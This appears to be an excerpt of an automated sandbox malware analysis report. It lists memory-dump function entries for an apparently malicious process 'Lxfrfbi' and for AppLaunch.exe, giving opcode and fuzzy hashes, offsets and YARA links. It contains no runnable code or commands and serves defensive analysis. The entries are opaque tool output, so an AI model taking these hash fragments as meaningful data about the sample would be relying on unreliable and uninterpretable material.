Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92812993161dfacd42c7483efe2512d30c127eccd7793962593971fe0b32c94f
Instruction ID: 31556af00b5b491fad81ca70eac8f9b67b121d7b5081cf86b17193fe1368da2c
Opcode Fuzzy Hash: 92812993161dfacd42c7483efe2512d30c127eccd7793962593971fe0b32c94f
Instruction Fuzzy Hash: 2AF019B0E18109CFDB25CFA5C8486A9BBF6BB8D300F108558E629A7216D7348944CF00

Uniqueness

Uniqueness Score: -1.00%

Function 01A180F1 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c458d63182c5d6e788b83992ff1d16cf5e98c33027bd4f0cf1997a6cefc36c4
Instruction ID: 662447e805be7163ff06ec7f62a42a300fe330c5f11df46184b036ffca2a5363
Opcode Fuzzy Hash: 2c458d63182c5d6e788b83992ff1d16cf5e98c33027bd4f0cf1997a6cefc36c4
Instruction Fuzzy Hash: ABF03AB2D04318CEEB209BA9D8087DEFBF5EB94325F18844AD059A7255C2B85985CF61

Uniqueness

Uniqueness Score: -1.00%

Function 01A17170 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 782bdc4fdb9d560a380d0fe6d8b6ec3fa7f9d521ea98447d1eebe90bcc8cb224
Instruction ID: 0040f1923fdc5d94017bff580e5f97664a865c2c5f3eb0a0cdc39edffcae928e
Opcode Fuzzy Hash: 782bdc4fdb9d560a380d0fe6d8b6ec3fa7f9d521ea98447d1eebe90bcc8cb224
Instruction Fuzzy Hash: 19E0C9767041286F9318DA6ED8D4D6BBBEEFBCD664355817AE508C7310DA319D0186A0

Uniqueness

Uniqueness Score: -1.00%

Function 01A18228 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34f0abbd808161bbf529cb8b488263ac4d673660f9aef8d3a9b982938162b0ba
Instruction ID: 253ba55dc256282fe174ed46bcf56113dfe4c31caff361b283f8f5b43cd8601a
Opcode Fuzzy Hash: 34f0abbd808161bbf529cb8b488263ac4d673660f9aef8d3a9b982938162b0ba
Instruction Fuzzy Hash: EFF092362007058FC724DB2AD884806BBEAEFC92253558979E55E8B725DA31EC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A110C0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11ec21740ced6fda990edabf08bc68849a721f2f254ffff7a27adea7b21ce4cf
Instruction ID: 29ebc2eb75482784cd0bdc17afcd8be984c073bc3de546111dc4c00f8799caf4
Opcode Fuzzy Hash: 11ec21740ced6fda990edabf08bc68849a721f2f254ffff7a27adea7b21ce4cf
Instruction Fuzzy Hash: BEF017B4D4120A9FDB80DFB8C5465AEBFF0FB05210F1084AAD609E7225D73189408F90

Uniqueness

Uniqueness Score: -1.00%

Function 07AFF490 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d7c8efffe5b2be33b8ce83d2c49d14ced31a45bbd5f0354be87a99cd8952ac7
Instruction ID: a6420fed35c0a6d2e0a78e39d8c70282bf8118bc19941ab502125a919a7a9234
Opcode Fuzzy Hash: 0d7c8efffe5b2be33b8ce83d2c49d14ced31a45bbd5f0354be87a99cd8952ac7
Instruction Fuzzy Hash: 04E0227120A245AFC306DBA4E5408F5BF319B03220F14C1CEED548B2A3CB365E42CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 07AF9C80 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91a8b989a55c1f10ce4c17e841dbc57943f58f000d544437fba851243e7ad037
Instruction ID: c1fd7d459305d50186eb781bc316bbd9d653ce83dfa3f6214ba76e4125c42d16
Opcode Fuzzy Hash: 91a8b989a55c1f10ce4c17e841dbc57943f58f000d544437fba851243e7ad037
Instruction Fuzzy Hash: E9F01774905208AFCB40DFA8D940A9DBBF4AB49300F10C09AE828A3211D6359A56DF41

Uniqueness

Uniqueness Score: -1.00%

Function 01A11478 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad4da3b2a15f6dfe7e4fcf163be32f7c85231be50d6ece0d96741e66b8bbf85b
Instruction ID: c65a9fe00cd1b361b9b5b29e8ed9b6041fe3e9d770046c697cdcec0ac35aff51
Opcode Fuzzy Hash: ad4da3b2a15f6dfe7e4fcf163be32f7c85231be50d6ece0d96741e66b8bbf85b
Instruction Fuzzy Hash: 5BE048726141249FD718D7E9A5005DA7BEDD749671F10407AD50DD3A44EA7298408790

Uniqueness

Uniqueness Score: -1.00%

Function 07AF94BE Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a9bcc8474c0ebc421ea22e9ffd252a7ee7813135065e37605f53b7a2239337d
Instruction ID: 2f398750cd0fc1a9168bb13ef7c85b60ec542e2450c02765014b8cbf48ace041
Opcode Fuzzy Hash: 5a9bcc8474c0ebc421ea22e9ffd252a7ee7813135065e37605f53b7a2239337d
Instruction Fuzzy Hash: A6F0F8B5A04218CFCB10DF95C540ADDB7B1FB89301F1181A5E619E7311C730AA418F50

Uniqueness

Uniqueness Score: -1.00%

Function 07AFDD78 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aec751f378cd75ca81b5a913c7dfefd9cce5a95748b67d927e18f07956a0094
Instruction ID: 41caa444b28eafa2ccda4da54967e239621a84a7cda455c17a4d3f1050e15e14
Opcode Fuzzy Hash: 4aec751f378cd75ca81b5a913c7dfefd9cce5a95748b67d927e18f07956a0094
Instruction Fuzzy Hash: 04E092F5942108FBC700EFB8D810BAA7BA8DF46200F0044E5E54497111DA354A1097A3

Uniqueness

Uniqueness Score: -1.00%

Function 01A180F8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10cbe0e5b48101f5755e165e702032254da8df9b23d98cbbaa5ce4023aa74483
Instruction ID: 650c713801d060971ce0fb058690c04f1ce5b181107accbd74e959c916ffa23e
Opcode Fuzzy Hash: 10cbe0e5b48101f5755e165e702032254da8df9b23d98cbbaa5ce4023aa74483
Instruction Fuzzy Hash: F9F015B2800308CAEB209B9AD8087DEFBF4EB54324F18C41AD059A7264C3B95485CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07AFCEA8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 477d0c0eba748b765b2a1f959531d9c62fee195da405d8ca1b347bf7ce69cf22
Instruction ID: 1faab107a2358093db1e2fc72f30c2713a12376a7ce4c7fead3d09bc92c2d15c
Opcode Fuzzy Hash: 477d0c0eba748b765b2a1f959531d9c62fee195da405d8ca1b347bf7ce69cf22
Instruction Fuzzy Hash: 46F039B4D49208EFCB04DFE8E5506A8BBB4EB89310F1480EEE858A7342D6355E41DB51

Uniqueness

Uniqueness Score: -1.00%

Function 07AF9C90 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d41f59e2ee47d4aff0c1b6525894caf9a4f601f01edd30fcd01db4b7d4b7b6c8
Instruction ID: 7b15cd6266aa9d6893c1e7c4dc76865cd35016836d5e8aba8745fbad624842c6
Opcode Fuzzy Hash: d41f59e2ee47d4aff0c1b6525894caf9a4f601f01edd30fcd01db4b7d4b7b6c8
Instruction Fuzzy Hash: 75F0A574E05208EFCB84DFA9D540A9DBBF5EB49310F10C0AAEC18E3350D636AA52DF41

Uniqueness

Uniqueness Score: -1.00%

Function 07AFC1E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b899c730be892cd78bee4c4b4a486cbcc31034e1abb3833fce4d9b910bd1c1ce
Instruction ID: 7c1cb1d1014112b963ac0c4c8d3980eb62daa6dc65549ab3e5c986476e62641b
Opcode Fuzzy Hash: b899c730be892cd78bee4c4b4a486cbcc31034e1abb3833fce4d9b910bd1c1ce
Instruction Fuzzy Hash: B2E086B465E288EFC301EBE4D850AA47FB4DB47214F1890DED9589B352D5328D0AC762

Uniqueness

Uniqueness Score: -1.00%

Function 01A10838 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b6338fbb894402f827ce2c164a22e6e55deb62f270b745bffc9af487290b581
Instruction ID: fb665117eace9c6c7e80a28c4e5479321d7ac02a46baa7cdc0a156650248c9f0
Opcode Fuzzy Hash: 6b6338fbb894402f827ce2c164a22e6e55deb62f270b745bffc9af487290b581
Instruction Fuzzy Hash: 6FE09A30A09308AFCB01CFB4D98849CBBF5FF8A208B0580E9D408D7212EA346E05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 07AFC5DA Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: effe0aa978ef629d2b8c0de9bd70080c7c3d73d201bbdfa859ad914d50cbea47
Instruction ID: d7ea13a7787ffc613bd72843861a57c1fe67385b4e716a6aead1b397aa3fd15e
Opcode Fuzzy Hash: effe0aa978ef629d2b8c0de9bd70080c7c3d73d201bbdfa859ad914d50cbea47
Instruction Fuzzy Hash: 3AE086B4A4520CEBCB08DFD4E5409BCBBB4AB46310F50D098E85533350C7315E42C791

Uniqueness

Uniqueness Score: -1.00%

Function 07AFE382 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28d27b8d3901dcc41d6aa2323020a9331a241db511f80925fb6f0808b77a1111
Instruction ID: 937db5e93fcfe424e606ca2956b96020fb54db93e4be55c8c374fe4ed3642d44
Opcode Fuzzy Hash: 28d27b8d3901dcc41d6aa2323020a9331a241db511f80925fb6f0808b77a1111
Instruction Fuzzy Hash: 26E04FB8909108EBCB04DF94F4459ACBB75AB86714F20D199ED0427351D6325EA1EB81

Uniqueness

Uniqueness Score: -1.00%

Function 01A16728 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aef313dc48f8aa183e636c6712c71de811602376f5427539714233a35552668c
Instruction ID: a581242e70563564db7dde6855c2549919253fc5e1eba8e4dbf8a984e4b22cb3
Opcode Fuzzy Hash: aef313dc48f8aa183e636c6712c71de811602376f5427539714233a35552668c
Instruction Fuzzy Hash: 12E0ED74911105EFCB50DFB4E9444ACBBB5FF883047248599D80593315DB311E55DB01

Uniqueness

Uniqueness Score: -1.00%

Function 01A1702C Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59d2c166fae739d3739ed5a76818dd72c7f5264dd0486fd0961fd54508311735
Instruction ID: 63bb7b4a0b3abbc615dece58293514bac201b1e090a212f5b630159895cc7484
Opcode Fuzzy Hash: 59d2c166fae739d3739ed5a76818dd72c7f5264dd0486fd0961fd54508311735
Instruction Fuzzy Hash: D0E0127AC0123CABCB20AFE9DC094DFFF79EF456A0B428126E918A7105D3B11A15DBD5

Uniqueness

Uniqueness Score: -1.00%

Function 07AFCEB8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 908d69b6b122e226dba94a45d6f6661edf9b916d9a2b29e0cc98319a48dcb1a3
Instruction ID: e7416dacf6d272b0e303ef80a105d8d06bfb11153f8e0c553719e7922d0bafbe
Opcode Fuzzy Hash: 908d69b6b122e226dba94a45d6f6661edf9b916d9a2b29e0cc98319a48dcb1a3
Instruction Fuzzy Hash: 6CE01AB4D0520CEBC744DFD8E4406ACBBB4EB89310F10C0A9E818A3340CA315E41DB51

Uniqueness

Uniqueness Score: -1.00%

Function 07AFF4A0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6d52e6b69c72e05e2b12d4a672a3c0dbd0fbad4f93c854c42e116f79685d5ba
Instruction ID: 09a8a22a4fcea2d8a1b25e1dd1ebe3e0a83ffa527e6927208021f70dea6e195f
Opcode Fuzzy Hash: c6d52e6b69c72e05e2b12d4a672a3c0dbd0fbad4f93c854c42e116f79685d5ba
Instruction Fuzzy Hash: E4E08674905208EFC704EFD4E440DACBB75EB45311F10C099ED0423351C7315E51DB91

Uniqueness

Uniqueness Score: -1.00%

Function 07AFE1D8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee05de257d2399b234af08b4d945822c32b3ace6e07568bd5f4bd13791ef5bf0
Instruction ID: 671f0538ee28fb596370307df69cdf2f803c7e8ac267fbc5ff039fabea664cfa
Opcode Fuzzy Hash: ee05de257d2399b234af08b4d945822c32b3ace6e07568bd5f4bd13791ef5bf0
Instruction Fuzzy Hash: 90E01274909218EBC704DFE8E9419ACBBB9EB86314F20D1DDE80867351CA315E42DB95

Uniqueness

Uniqueness Score: -1.00%

Function 07AFDD88 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 355a21ba4cc1609f75cc0ec4aa4dd3aa051b6c69f39a34d6187c414e45340fc3
Instruction ID: c503ca1d8100e0366cf3c4f8e5e40d14eb5a4c819606dd7372080a0ddfa15ef3
Opcode Fuzzy Hash: 355a21ba4cc1609f75cc0ec4aa4dd3aa051b6c69f39a34d6187c414e45340fc3
Instruction Fuzzy Hash: F1E0C2F194220CEBC740FFF89500A9E7BB9DB45200F0044E5E20493110EE364A00D792

Uniqueness

Uniqueness Score: -1.00%

Function 01A16730 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b88eb04b9fde315580b68066c55dd89a684e90ecefa30bdf3ac7c4c05d488c
Instruction ID: 8aa5c5f44621e7836b6026d2763dad9be5603f6c3b21e41327dbedc353fd5f79
Opcode Fuzzy Hash: c9b88eb04b9fde315580b68066c55dd89a684e90ecefa30bdf3ac7c4c05d488c
Instruction Fuzzy Hash: 42E0E674A16109EFCB00EFA4E94459DBBB9FB48305B108595DC09D3315DB316F05DB51

Uniqueness

Uniqueness Score: -1.00%

Function 01A11130 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 550e52b94beead73210649404c09457c9bf9afa2772dadae649117009e7785c8
Instruction ID: cfd968b0bf408ca5591c62cceb960c9fb4a6e92fb2ca97f5e71f412539ecdfe5
Opcode Fuzzy Hash: 550e52b94beead73210649404c09457c9bf9afa2772dadae649117009e7785c8
Instruction Fuzzy Hash: 1AE0C2363100144F8308ABB9E4088643BE6FB8C62431084A1ED0AC3324CF30DC008FA1

Uniqueness

Uniqueness Score: -1.00%

Function 07AFC1F0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcf8bd61abcd40e3bf8f6cba60f609931e6f33bea046334b50bd970d59e74e11
Instruction ID: c1e65418a7871cd2263d22699430616a89560ff3c9ac7f101e9a3cad4b4f1f7d
Opcode Fuzzy Hash: dcf8bd61abcd40e3bf8f6cba60f609931e6f33bea046334b50bd970d59e74e11
Instruction Fuzzy Hash: 4CD0A7B054910CFBC744EBD5E840B69B7BCDB47324F10909DE92853351DA329E01C761

Uniqueness

Uniqueness Score: -1.00%

Function 01A124E8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 919c28570c207b39227aead04280370ebca15de30eae4e58274ccf526f39b953
Instruction ID: 7d18300b923e56877db01d0b379c7cdc9aff518e467308a0af4caab64ce3da76
Opcode Fuzzy Hash: 919c28570c207b39227aead04280370ebca15de30eae4e58274ccf526f39b953
Instruction Fuzzy Hash: E6D09B7090520DEFCB40DFB8EA4159DF7F5EB45214B5045ADD40DD7314EA316F049B51

Uniqueness

Uniqueness Score: -1.00%

Function 01A124D7 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85736b7a0153a3ef89b235ab8bead250a6436eccc946e8186a7de0d45ae9b376
Instruction ID: 290d0c8b3b43bbaf7f8f54f1b2f781f97bde223b7bd8a2dd5e8462c077fbe7df
Opcode Fuzzy Hash: 85736b7a0153a3ef89b235ab8bead250a6436eccc946e8186a7de0d45ae9b376
Instruction Fuzzy Hash: 48E0EC70905245DFC714DBB4E64569DB7B0EF41208F2045DD98495B214DB325E5A9B82

Uniqueness

Uniqueness Score: -1.00%

Function 01A10848 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73ae8e98b5cde2390062d80c819301b9241f71767b9df23f772fc8e3d597575d
Instruction ID: d8984196f0d00af475c219d849022109c34537891bad8cbea2f421d3222246c8
Opcode Fuzzy Hash: 73ae8e98b5cde2390062d80c819301b9241f71767b9df23f772fc8e3d597575d
Instruction Fuzzy Hash: 73D01730A05208FF8B00DFB8EA4459DB7F9FB85204B1045A8980DE3201EA31AF009B91

Uniqueness

Uniqueness Score: -1.00%

Function 01A17038 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
Instruction ID: 9d46dfebc63ec127431d88a6a65d2dfee8c104197ca29bd01b6178cca5828afd
Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
Instruction Fuzzy Hash: 73D05E72C00138978B10AFE99C044DFFF79EF04650B418126E914A7101D3711A20CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 01A126B0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e0b899179aa1af5d3cad12f7d94e95777a08c5b5b24a1e4eacbb27699a71de0
Instruction ID: 9d3c752dc089f06129fbc540b037b8277858afdd78b76ebbe9f68c7bcb3cc755
Opcode Fuzzy Hash: 2e0b899179aa1af5d3cad12f7d94e95777a08c5b5b24a1e4eacbb27699a71de0
Instruction Fuzzy Hash: 91B092313582084AEAA0A7BA7804B2636CC97C0658F4004A2B80CC1945E586E4602260

Uniqueness

Uniqueness Score: -1.00%

Function 01A126AE Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d90be4151d2a692c253d8fd4fcf9d058e89804b5396f073135e2ab48df5f6f0
Instruction ID: 62e96996afcc80a2ae3184819e4b75658fe0eb8ef74b0bd4694e9c36d8d10141
Opcode Fuzzy Hash: 6d90be4151d2a692c253d8fd4fcf9d058e89804b5396f073135e2ab48df5f6f0
Instruction Fuzzy Hash: 9AB012307553049F9FF19BF5A445A6B3FECEAC1194310447BDC0DC0915E261C0315B10

Uniqueness

Uniqueness Score: -1.00%

Function 07AFFE71 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270941016.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7af0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de900a158d6698da0e2270d02ec8b66be20b9bb82846c89c575c48c40220957e
Instruction ID: 6539f1f17fc2a11ff2f0cdef9bcce1dd477225de0b848ca95fb6558d2fded79a
Opcode Fuzzy Hash: de900a158d6698da0e2270d02ec8b66be20b9bb82846c89c575c48c40220957e
Instruction Fuzzy Hash: 27C09B747443445FEF025B10CA167443F30E741740F11014197595F1C3929C641D8A12

Uniqueness

Uniqueness Score: -1.00%

Function 01A1252C Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2054189543.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1a10000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9520483da65fc3b13d36d205e107fed2c7c5552318ca02fb398bf6dfe0090dca
Instruction ID: 6d53ac10e63b15291fd9bb391266f1ff66a7ae507eaa7d155d1b9d98419132ec
Opcode Fuzzy Hash: 9520483da65fc3b13d36d205e107fed2c7c5552318ca02fb398bf6dfe0090dca
Instruction Fuzzy Hash: 79A022A02082C00E8E23F320032CE223E820A83308B0800C8C08B8B003C828000ACF00

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AppLaunch.exePID: 7432, Parent PID: 8140COMMON

Executed Functions

Function 05260EBB Relevance: 2.7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

Strings

(bq, xrefs: 05261192
Te^q, xrefs: 05260EED

Memory Dump Source

Source File: 00000011.00000002.2100091109.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5260000_AppLaunch.jbxd

Similarity

API ID:
String ID: (bq$Te^q
API String ID: 0-2856382362
Opcode ID: 24b33621f10c7442310727d34286376d04b1ba7aaa788fed14d3cc4546f6b880
Instruction ID: 61091b26795e1e1238aef983dfc1f0b34baa77a572e5f2d2ecc643f96b1361f7
Opcode Fuzzy Hash: 24b33621f10c7442310727d34286376d04b1ba7aaa788fed14d3cc4546f6b880
